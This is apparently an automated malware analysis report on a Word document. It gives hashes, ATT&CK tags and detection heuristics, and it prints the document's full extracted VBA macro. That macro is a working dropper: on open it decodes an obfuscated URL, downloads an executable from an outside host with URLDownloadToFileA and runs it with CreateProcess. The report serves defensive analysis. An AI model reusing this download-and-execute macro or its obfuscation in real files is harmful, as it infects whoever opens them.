Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 74b97e14d3a1ca95…

MALICIOUS

Office (OOXML)

133.2 KB Created: 2020-02-11 06:51:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2020-05-25
MD5: 94c1c1cba83e6b9107910f26863a988c SHA-1: c862cbbd6ad5abeaf35514e8678cfa4063f577b2 SHA-256: 74b97e14d3a1ca95e611010c817206bf2cc0b8b2ead478a50af558c1eb016538
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an OOXML document containing a VBA macro that executes an AutoOpen function. This function utilizes the URLDownloadToFileA API to download a second-stage payload from a remote location. The document body presents a fake system error message to lure the user into executing the malicious content.

Heuristics 4

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare Function SideBySide Lib "urlmon" Alias _
  "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal _
    szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Public Sub AutoOpen()
ret = 53
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://7de3.shandow.ru/Drumheads.exeSystemComponentModelTypeDescriptorTypeDescriptorInterfaces Referenced by macro
    • http://7de3.shandow.ru/Drumheads.exeSystemComponentModelTypeDescriptorTypeDescriptorInterfaces�Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • http://support.microsoft.com/kb/899921Referenced by macro
    • http://support.microsoft.com/kb/902312Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3507 bytes
SHA-256: d42a2e36ecb8899f7d93aabea00bc9fdad7fa2bc25def7d826c118ad766ac6be
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Declare Function SideBySide Lib "urlmon" Alias _
  "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal _
    szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long


Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO)

Option Explicit

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type


Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Byte
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Const SW_SHOWNORMAL             As Long = 1
Private si    As STARTUPINFO
Private pi    As PROCESS_INFORMATION
Dim ret
Dim das
Dim sas

Public Sub AutoOpen()
ret = 53
das = Replace("SystemComponentModelTypeDescriptorTypeDescriptorInterfaceshttp://7de3.shandow.ru/Drumheads.exeSystemComponentModelTypeDescriptorTypeDescriptorInterfaces", "SystemComponentModelTypeDescriptorTypeDescriptorInterfaces", "")
ret = 53
sas = Replace("mNetChunkParserReadStateqSystemComponentModelDesignStandardCommandsVSStandardCommandsE.emNetChunkParserReadStateqxe", "mNetChunkParserReadStateq", "")
ret = 331
ret = SideBySide(0, das, sas, 0, 0)
SystemDataSqlClientSqlColumnEncryptionCspProviderb (sas)
End Sub

Public Function SystemDataSqlClientSqlColumnEncryptionCspProviderb(Filename As String)
Const WindowStyle As Long = SW_SHOWNORMAL
If WindowStyle = WindowStyle Then

    Const STARTF_USESHOWWINDOW      As Long = 1
    Const NORMAL_PRIORITY_CLASS     As Long = &H20
    
    Dim CommandLine As String
    
    Dim n           As Long
    Dim lr          As Long
    Dim CmdLine     As String
    Dim argc        As Long
    Dim argv()      As String
    

    CmdLine = """" & Filename & """"

    si.cb = Len(si)
    GetStartupInfo si
    si.dwFlags = STARTF_USESHOWWINDOW
    si.wShowWindow = WindowStyle

If WindowStyle = WindowStyle Then

    lr = CreateProcess(vbNullString, _
                       CmdLine, _
                       ByVal 0, _
                       ByVal 0, _
                       False, _
                       NORMAL_PRIORITY_CLASS, _
                       ByVal 0, _
                       vbNullString, _
                       si, _
                       pi)
End If
End If


    SystemDataSqlClientSqlColumnEncryptionCspProviderb = lr
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 19968 bytes
SHA-256: 9c63bfca82b91f243f567faa958339b7eafd4c5df086197824599342c56d1535

Open this report in the interactive analyzer, or submit your own file for analysis.